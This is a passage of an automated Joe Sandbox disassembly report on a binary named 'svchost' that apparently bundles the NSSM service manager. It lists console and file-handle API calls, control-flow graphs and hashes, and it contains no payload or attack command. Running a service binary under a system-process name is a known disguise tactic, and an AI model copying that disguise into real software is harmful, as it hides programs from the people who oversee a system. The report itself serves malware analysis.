                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004039F5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403A06
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403A0A
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403A34
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403A45
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403A49
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403A73
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403A84
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403A88
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00403AAC
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00403ABD
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403AC1
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403AE8
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403AF9
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403AFD
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403B24
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403B35
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403B39
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403B60
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403B71
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403B75
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403B9C
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403BAD
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403BB1
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403BD8
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403BE9
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403BED
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00403C17
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00403C28
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403C2C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403C56
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403C67
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403C6B
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 00403C95
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00403CA6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403CAA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 00403CD4
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00403CE5
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403CE9
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403D13
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403D24
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403D28
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403D52
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403D63
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403D67
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403D91
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403DA2
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403DA6
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00403DCA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00403DDB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403DDF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403E06
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403E17
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403E1B
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403E42
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403E53
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403E57
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403E7E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403E8F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403E93
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403EBA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403ECB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403ECF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00403EF6
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403F07
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403F0B
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00403F35
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00403F46
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403F4A
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00403F74
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00403F85
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403F89
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403FB3
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00403FC4
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403FC8
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00403FF2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404003
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404007
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404031
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404042
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404046
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404070
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404081
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404085
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004040AF
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004040C0
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004040C4
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004040E8
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 004040F9
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004040FD
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404124
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404135
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404139
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 00404160
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 00404171
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404175
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040419C
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004041AD
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004041B1
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004041D8
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004041E9
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004041ED
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404214
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404225
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404229
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404250
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404261
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404265
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040428F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004042A0
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004042A4
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004042CE
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004042DF
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004042E3
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040430D
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040431E
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404322
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 0040434C
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040435D
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404361
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040438B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040439C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004043A0
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004043CA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004043DB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004043DF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404409
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 0040441A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040441E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00404442
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00404453
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404457
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040447E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040448F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404493
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000004,?,?), ref: 004044BA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 004044CB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004044CF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004044F6
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404507
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040450B
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404532
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404543
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404547
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040456E
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040457F
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404583
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 004045AA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004045BB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004045BF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004045E9
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004045FA
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004045FE
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404628
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404639
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040463D
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404667
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404678
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040467C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004046A6
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004046B7
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004046BB
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004046E5
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004046F6
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004046FA
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404724
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404735
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404739
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404763
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404774
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404778
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 004047A2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 004047B3
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004047B7
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 004047DB
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 004047EC
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004047F0
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00404817
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404828
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 0040482C
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000002,?,?), ref: 00404853
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404864
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404868
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 0040488F
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004048A0
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004048A4
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004048CE
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004048DF
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004048E3
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000004,?,?), ref: 0040490D
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000004,?,?), ref: 0040491E
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404922
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040494C
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040495D
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404961
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 0040498B
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 0040499C
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004049A0
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 004049CA
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 004049DB
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 004049DF
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00404A09
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00404A1A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404A1E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404A48
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404A59
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404A5D
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000000,00000050,?,?), ref: 00404A81
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000050,?,?), ref: 00404A92
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404A96
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404ABD
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404ACE
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404AD2
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404AF9
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404B0A
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404B0E
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,00000040,00000001,?,?), ref: 00404B35
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404B46
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404B4A
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404B74
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404B85
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404B89
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000003,?,?), ref: 00404BB3
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000003,?,?), ref: 00404BC4
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404BC8
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404BF2
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404C03
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404C07
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404C31
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404C42
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404C46
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000002,?,?), ref: 00404C70
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000002,?,?), ref: 00404C81
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404C85
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404CAF
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404CC0
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404CC4
                                                    • FillConsoleOutputAttribute.KERNEL32(00000000,000000C0,00000001,?,?), ref: 00404CEE
                                                    • FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000001,?,?), ref: 00404CFB
                                                      • Part of subcall function 00401A30: GetStdHandle.KERNEL32(000000F5), ref: 00401A35
                                                      • Part of subcall function 00401A30: FillConsoleOutputAttribute.KERNELBASE(00000000,000000C0,?,?,?), ref: 00401A62
                                                      • Part of subcall function 00401A30: FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401A72
                                                      • Part of subcall function 00401AD0: GetStdHandle.KERNEL32(000000F5), ref: 00401AD5
                                                      • Part of subcall function 00401AD0: FillConsoleOutputAttribute.KERNELBASE(00000000,00000000,?,?,?), ref: 00401AFF
                                                      • Part of subcall function 00401AD0: FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401B0F
                                                      • Part of subcall function 00401A80: GetStdHandle.KERNEL32(000000F5), ref: 00401A85
                                                      • Part of subcall function 00401A80: FillConsoleOutputAttribute.KERNELBASE(00000000,00000040,?,?,?), ref: 00401AAF
                                                      • Part of subcall function 00401A80: FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401ABF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: Console$FillOutput$Handle$AttributeCharacter$MenuService__snwprintf_s$AllocCloseDisplayEnableItemManagerNameOpenSystemTitleWindow_memset
                                                    • String ID: NSSM$[%s] %s
                                                    • API String ID: 2807076079-2869788218
                                                    • Opcode ID: 4633ee1047948a390348f6dda80a8a7e8cdc6cc0fbec7c961c1e38324070d8c3
                                                    • Instruction ID: 0963313f467e621256798e3be32ce80b724b5108aba0c87ac21b87ba8057b7f0
                                                    • Opcode Fuzzy Hash: 4633ee1047948a390348f6dda80a8a7e8cdc6cc0fbec7c961c1e38324070d8c3
                                                    • Instruction Fuzzy Hash: 7473CB7125830A6EE210DF94DD41F6BB2EDEFD8B00F004A1DB655E72D1E6A4AD0887B7

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 93 409270-409277 94 409279-40927d 93->94 95 40927e-409297 call 401b20 93->95 98 409299-4092c0 CreateFileW 95->98 99 4092ec-409301 95->99 98->99 102 4092c2-4092eb GetLastError call 4052c0 call 405400 98->102 100 409464 99->100 101 409307-40930e 99->101 105 40946a-409478 100->105 103 409310-40932f call 4089b0 101->103 104 409332-409358 call 408870 101->104 103->104 119 40944e-409457 104->119 120 40935e-409365 104->120 109 409681-40968f 105->109 110 40947e-409490 call 4097b0 105->110 115 409695-4096a2 109->115 116 40979a-4097a0 109->116 128 409516-40951d 110->128 129 409496-4094dc GetCurrentProcess * 2 DuplicateHandle 110->129 122 4096f0-4096f7 115->122 123 4096a4-4096ba GetCurrentProcess GetStdHandle GetCurrentProcess DuplicateHandle 115->123 126 4093f0 120->126 127 40936b-409378 120->127 124 409745-40974c 122->124 125 4096f9-40970f GetCurrentProcess GetStdHandle GetCurrentProcess DuplicateHandle 122->125 123->122 130 4096bc-4096ef GetLastError call 4052c0 call 405400 123->130 124->116 137 40974e-409764 GetCurrentProcess GetStdHandle GetCurrentProcess DuplicateHandle 124->137 125->124 135 409711-409744 GetLastError call 4052c0 call 405400 125->135 131 4093fa-409401 126->131 127->126 136 40937a-4093db call 409130 127->136 133 409547-409573 call 408870 128->133 134 40951f-409544 call 4089b0 128->134 129->109 138 4094e2-409515 GetLastError call 4052c0 call 405400 129->138 131->100 140 409403-409422 GetCurrentProcess * 2 DuplicateHandle 131->140 160 409661-40966a 133->160 161 409579-409580 133->161 134->133 136->131 162 4093dd-4093ee CloseHandle * 2 136->162 137->116 146 409766-409799 GetLastError call 4052c0 call 405400 137->146 148 409424-40944b GetLastError call 4052c0 call 405400 140->148 149 409458-409462 140->149 148->119 149->105 168 409586-409593 161->168 169 40966b-409675 161->169 162->131 168->169 173 409599-4095fa call 409130 168->173 172 409613-40961a 169->172 172->109 174 40961c-409635 GetCurrentProcess * 2 DuplicateHandle 172->174 180 4095fc-40960b CloseHandle * 2 173->180 181 40960d 173->181 177 409677 174->177 178 409637-40965e GetLastError call 4052c0 call 405400 174->178 177->109 178->160 180->181 181->172
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000001,?,00000000,?,?,00000000), ref: 004092B5
                                                    • GetLastError.KERNEL32(00000000), ref: 004092C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_svchost.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorFileLast
                                                    • String ID: AppStderr$AppStdout$STD_ERROR_HANDLE$STD_INPUT_HANDLE$STD_OUTPUT_HANDLE$stderr$stdin$stdout
                                                    • API String ID: 1214770103-1833172568
                                                    • Opcode ID: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
                                                    • Instruction ID: 6ae8fdd2871f227cf13b581f7b9c8d83ca64bc36ba86afe41948fee67ebde81e
                                                    • Opcode Fuzzy Hash: 616819472e838b286589a2bbe120a1ed2100ae1f041291cb188454517c6769bf
                                                    • Instruction Fuzzy Hash: 82E184F1940704ABD724DB75DC45FE773ACEB84308F40492EF65E93182E679A844CB69

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 186 40bec0-40bef7 call 412cf0 call 40b440 191 40bf14-40bf48 call 40ace0 186->191 192 40bef9-40bf13 call 412cdc 186->192 197 40bf4a-40bf6d RegCloseKey call 412cdc 191->197 198 40bf6e-40bf94 call 40ace0 191->198 203 40bfc1-40bfe6 call 40ace0 198->203 204 40bf96-40bfbe call 405400 call 412d20 198->204 210 40bff2-40c019 call 412731 call 409870 203->210 211 40bfe8-40bfec 203->211 204->203 222 40c05a-40c06f call 405400 210->222 223 40c01b-40c029 GetWindowsDirectoryW 210->223 211->210 213 40c072-40c092 call 40ace0 211->213 219 40c098-40c09d 213->219 220 40c1ae-40c1b6 213->220 219->220 225 40c0a3-40c0b9 call 40c820 219->225 224 40c1bc-40c20c call 40ab70 * 2 call 40af80 220->224 222->213 226 40c032-40c055 call 405400 RegCloseKey 223->226 227 40c02b-40c030 223->227 252 40c23e-40c255 call 40af80 224->252 253 40c20e-40c21d call 40c9a0 224->253 237 40c0e3-40c0fc GetCurrentProcess GetProcessAffinityMask 225->237 238 40c0bb-40c0de call 405400 225->238 241 40c541-40c559 call 412cdc 226->241 227->222 227->226 237->224 240 40c102-40c122 237->240 238->224 244 40c124-40c128 240->244 245 40c12e-40c147 call 40c610 240->245 244->224 244->245 255 40c198-40c1ac GetProcessHeap HeapFree 245->255 256 40c149-40c162 call 40c610 245->256 261 40c267 252->261 262 40c257-40c265 252->262 264 40c227-40c23b call 405400 253->264 265 40c21f-40c225 253->265 255->224 267 40c184-40c192 GetProcessHeap 